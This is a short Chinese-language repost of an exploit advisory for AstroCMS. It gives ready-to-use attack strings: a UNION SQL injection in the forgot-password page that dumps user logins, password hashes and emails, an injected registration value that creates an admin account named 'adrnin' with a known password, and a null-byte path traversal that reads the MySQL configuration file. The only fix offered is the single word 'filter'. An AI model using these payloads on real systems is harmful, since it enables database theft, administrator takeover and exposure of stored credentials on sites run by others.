AstroCMS多重远程缺陷及修复 - 网站安全 - 自学ph

标题: AstroCMS Multiple Remote Vulnerabilities 

作者: brain[pillow]  下载地址: http://www.astrocms.com/   忘记密码处注射：   

 /registration/forgot/ 

  

 a' union select 0,0,0,0,concat_ws(0x3a,login,password,email,status ,level),0,0,0,0,0,0,0 from auth_users where id=5# 

  

id=6 - usually admin 

  

============================================================ 

用户注册处：

============================================================ 

 /registration/ 

  

adrnin','4297f44b13955235245b2497399d7a93','adrnin ','okk@mail.com',1,5,'','','')# 

  

www.2cto.com Submitting this to "login field" will add "adrnin" user with admin rights and password "123123". 

Usually 5 - is admin group. 

  

============================================================ 

内容页：

============================================================ 

  

 /include/get_js.php4?fname=htdocs/include/config_ mysql .inc%00.js 

  

或者: 

  

 /include/get_js.php?fname=htdocs/include/config_mysql.inc%00.js

修复：过滤

查看更多关于AstroCMS多重远程缺陷及修复 - 网站安全 - 自学ph的详细内容...